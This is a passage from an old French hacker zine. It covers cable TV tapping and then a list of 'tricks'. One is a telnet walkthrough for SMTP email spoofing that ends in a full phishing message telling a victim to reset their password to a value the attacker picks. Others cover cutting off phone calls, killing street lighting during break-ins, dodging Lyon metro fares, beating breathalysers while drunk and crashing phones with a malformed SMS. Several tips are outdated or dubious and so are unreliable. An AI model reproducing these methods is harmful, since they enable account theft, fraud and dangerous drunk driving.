dans le garage il peut allimenter 3 ou 4 tele de la il faut faire partir un
fil jusqu a chez les voisin

Si l instalation se fait avec decodeur particulier il faut faire partir le
fil de derriere le decodeur ce qui apporte plus de probleme

Si ta pas peur tu prend ton fils de tele avec le bon raccord et tu va te
brancher direct dans la borne TRES RISQUER !!


Malheuresement je manque de renseignement sur le connexion internet je ne
peut donc dire que peut de chose mais surrement que cet ete cet article aura
une suite speciale internet par le cable
De plus le fait d etre a plusieur sur un cable pourrait cree des probleme
de debit

TOUTE CES INFORMATION SON UNIQUEMENT THEORIQUE VU LA JEUNESSE DU CABLE AUCUN
TEST N A PUT ETRE FAIT D AUTANT PAS A MA CONNAISSANCE C EST POURQUOI SI VOUS
AVEZ DES CORRECTION A APPORTER ELLE SONT LE BIEN VENUE MOI MEME N AYANT PAS
LE CABLE ET N AYANT AUCUNE FORMATION SUR CE SUJET




--->BONUS<---
DIVERS PETIT TRUCS & ASTUCES
----------------------------

La plupart de ses truc son donner par ThreaT, mais vue que j'ai appris
tous sa par le bier d'experiance dont certain element m'on eter apris
par d'otre, je ne me permet pas de m'en aproprier le credit

Bon, nous alons donner ici quelques petit truc et astuce, qui peuvent servir
de temp a autre. Certain de ces truc n'on rien a voir avec le HCP!

SOMMAIRE..

1/Eteindre les Rues
2/Ecouter une conversation telephonik sans se faire entendre
3/comment nuker une conversation telephonik
4/telephoner gratos de portable a portable
5/envoyer un mail anonyme manuellement
6/ce faire reveiller par FT gratos!
7/Froder le metro lyonnais.
8/Finter les Alcotest.
9/comment Kuter un Telephone Portable

--->1/ETEINDRE LES RUES.
Sa vous est jamais arriver lors d'une operation de Hustling ,de Trash ou de
beigebox, d'etre enmerder par des putain de lampadaire qui vous eclairait
la geule pendent votre forfait :(
Comment eteindre ces putain de lampadaire?
A/eteindre un sale lampadaire a court terme
bon, pour eteindre un lampadaire a cour terme (5MN) il fo que celui si
soit monter sur un pied en metal! il sufit de lui mettre un bon coup de savate
ce qui provoqueras un cours circuit dans la lampe, et eteindra le lampadaire
pendent 5mn "ceci ne marche pas avec les gros lampadaire en beton"

B/eteindre tout les lampadaire en beton
donc, pour cela il fo trouver le transfo de la rue, une fois celui si trouver
il fo l'ouvrir avin d'y abaisser l'interupteur, ce qui eteindra caremment
toute la rue. une autre technik consiste a emmetre une lumiere (bougie, lampe
de poche, laser) dans la photo resistance du transfo

---->2/ECOUTER UNE CONVERSATION TEL SANS CE FAIRE ENTENDRE
Tres simple. si vous avez un ancien telephone, y'a 2 facon
1/ vous demonter le conbiner de la ou vous parler, et vous y virer le
HP, mais cette technik se remark trop, et moi j'laime pas, donc

2/vous demonter votre telephone, et vous deviser le fil qui ce trouve tout
a gauche de la bande de branchemment
tester et approuver!

---->3/NUKER UNE CONV TEL
Imaginer que votre bahu appelle cher vous pour dire a votre pere que vous ete
pas venu depuis 3 mois!
Putain, il fo couper la conversation et VITE.
tres simple, va dans une autre piece ou il y a une ligne telephonik. demonte
la prise et coursircuite la ligne en branchent le blanc et le gris ensemble.
ceci auras pour effet de lancer un gros blanc dans la conversation qui
obligeras les deux interlocuteur a racrocher croyant qua la ligne est pourit

---->4/PHONER GRATOS DE PORTABLE A PORTABLE
Bon, je tient a dire que les technik que je vais dire ne marche pas sur
tout les portable, donc aller y molo si sa marche pas. de plus il fo
que la converse ce passe entre 2 portable.
1/ tu compose le N° de ton pote en le finissant par 00#
2/ tu appelle ton pote, et une fois que celui si a decrocher tu tape 2 fois
sur la touche "NO" et tu termine par #

---->ENVOYER UN MAIL ANONYME MANUELLEMENT.
Bien qu'il existe des soft pour cela , on vas vous espliker comment envoyer
des mail anonyme ou des mail spoofer.

etape 1: trouver le serveur smtp du domaine a mailer
etape 2: s'y connecter
etape 3: composer le mail
etape 4: se casser

exemple de mail spoofing du serveur CARAMAIL
1/trouver le smtp
donc la vous aller sous dos et vous taper
tracert www.caramail.com

dos repont un truc du type

Tracing route to [205.65.123.8] www.caramail.com
over a maximum of 30 hop

1 10ms 10ms 10ms www.tamere.com [221.121.21.67]
2 32ms 32ms 12ms www.lamerz.com [225.221.32.1]
3 22ms 12ms 34ms www.onsenfou.com [221.212.3.43]
4 21ms 34ms 12ms www.caramail.com [205.65.123.8]

Trace complete.
etape 2
bon, on vas commencer a balancer des connection sur le port 25 afin de
trouver ou est le serveur SMPT!
donc on commence par la fin
C:\>telnet 205.65.123.8 25
connection refuser!

C:\>telnet 221.212.3.43 25
connection refuser

C:\>telnet 225.221.32.1 25
BingO!
Connected bla bla bla.

donc, maintenant qu'on est sur le SMPT, on passe a l'etape 3
HELO www.caramail.com
mail from:Administrateur@caramail.com
rcpt:victime@caramail.com
subject:Probleme d'identification
data:
suite a un probleme de la part de nos operateur, nous avons le regret
de vous informer que votre compte caramail a ete pirate.
afin de pouvoir identifier les auteur de cette action nous vous demandons
de changer votre mot de passe par MVMHC ce qui nous permetra d'identivier
les technique uiliser par les malfaiteur.
merci de votre compreantion.

administration caramail.
. <--- le point sert a finir le message

et voila!
la victime recevra un courier de l'administrateur qui lui dmande de changer
son pass!
(cette technik est utiliser pour hacker des compte multimania)


---->6/CE FAIRE REVEILLER GRATOS PAR FT
vous connesser tous le rappelle automatique "*55*HHMM#"
ceci sert au gens comme moi qui on un reveil pourit qui marche une nuit sur
quatre et qui ne sonne pas asser fort pour les reveiller.
selemment, pour ce faire reveiller par FT il fo payer 3,60F
un peut cher non.
donc, tres simple (reserver au phreaker) il fo une VMB avec apelle automatique
et programmer le rappelle a 'l'heure ou vous vouler vous faire reveiller.


---->7/FRODER LE METRO LYONNAIS.
Bon, cette technik n'est applikable que sur le metro lyonnais, sur la
ligne A direction perrache.
OK, tu ne prend que la ligne A et t'a pas envie de payer ton retour a
perrache.
newbie "oui, mais a perrache, C toujours bourer de controleur"
Exact, et voila la technik pour les finter (si tu la connait pas deja).
donc, je t'esplik! quand tu arrive a perrache tu entend une salope qui
dit "perrache, terminus, tous les voyageur dessende de voiture" tu entre
dans la station, et la que voit tu arrg, plein de controleur. merde!
Mais tu remarkeras que le fireWall des controleur est tres vulnerable.
effectivemment, ces salaud on 2 point strategique pour te faire cracker ta
tunasse.
soit il sont vers les escalier, soit il bloque l'endroi ou y'a le poteau.
quand les controleur sont vers les escalier, il sont deborder, vue le
pipole qui bombe comme des marteau pour pas louper leur train! donc
toi tu en profite pour t'esciver sur la sorti de droite au lieu de prendre
les escalier.
quand les controleur sont au poteau! C plus dificile car C a cette endroi
que le passage ce retreci! et C la que ses con te bloque.
donc il fo prevoir le coup a l'avance! effectivemment la technik consiste
a ce mettre dans le Premier vagon qui est toujours eppargner par cette
technik de control.
bon, si vraimment t'a pas de bol, et que y'a 50 controleur qui bloque toute
les issu avec des militaire, ben il fo pratiquer le HustlinG.
tu te planque bien dans le vagon, et tu attend que le metro reparte dans
l'otre sens (Tester et approuver).
biensur, si les contoleur monte a cordelier ou a ampere, t'a plus qu'a conter
sur ta bonne etoile.

---->7/FINTER LES ALOTEST
je tient a dire que je ne suis pas partisans des gens qui conduise bourrer
mais sa fait chier quan t'a bu une petite sunrize et que les poulet t'attende
pour un ALCOTEST
Donc, voila le truc (jlais pas tester, mais mon couzin me dit que sa marche)
Il fo avoir dans sa caisse un tube pour les asmatique, tu sais, le truc
qui fait pchit. et des que tu vois les poulet, tu en prent un ou 2.
ce truc a pour effet 1. il te donne plus de souffle
2. de rafraichir l'alaine
donc, tu passe l'alcotest tranquille.

---->9/COMMENT KUTER UN PHONE PORTABLE
Pour finir en beauter, il parait que certain telephone portable contienne
un BUG. Effectivemment, si vous envoyer a votre victime un message contenant
188 arobase (@) sur son phone, celui si ne pourat plus l'effacer.
voici ce qui se passe exactemment:
quand la victime alume son Phone, un voyant rouge clignote lui indiquant
qu'il a recu un message, celui si le consulte, appui sur suppr, le phone
demande d'appuyer sur OK, et quand il appuye dessus, le phone s'eteint.



C'ETAIT LES QUELQUE PETIT TRUC POURIT HISTOIRE DE DIRE DE BIEN FINIR!

PS: si vous desirer un article plus detailler sur l'un de ces truc,
mail me to ThreaT@Caramail.com
l'artcile paraitra dans M*V*M II, qui sortiras dans tres tres longutemps
(cette ete peut etre)


--->FIN<---
LES MOTS DE LA FIN
------------------

Voila, notre 1er Zines est fini! si celui si a appris 1 chose a 1 personne
nous aurons reussi notre mission qui est d'essayer d'appendre un miximum au
newbiez d'aujourd'hui, qui, comme le dit si bien norace, sont l'elite de
demain.
celui si est le premier zine! nous l'avons ecrit pour preparer le terrain.

mais nous attakerons des sujet plus interresant dans le 2eme comme
COMMENT TROUVER DES OUTDIAL?
LES FONCTION DE LINUX
HACK WITH IP SPOOFING
HACK DU CABLE (suite)
ETC...
(Si on est toujours la)


****************************************************************************
--- Mobilisation * Virtuelle * Minoritaire ---
Pour que notre minoriter devienne une majoriter dans un monde de lamerositer
****************************************************************************

ThreaT: "La prison me guette! mais j'espere que QQ1 arriveras a faire changer
"ce monde de Lame"

Bolliop: "Faite avancer la scene francaise merde"

Angus: "FT nous encule, Alors enconlons FT"

DamsKiller: "Je veut une feeemmmee!)

Maverick: "Putain! TOUTES DES SALOPES"

DreaD: "arrete CoqS! melange pas ses 2 produit aarrrggg...."

CoqS: "C bon, je sais ce que je fais..."

BOOOOOOMMMM *~#'& NO Carrier



--- M * V * M ---
Hackers
C l a n

loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT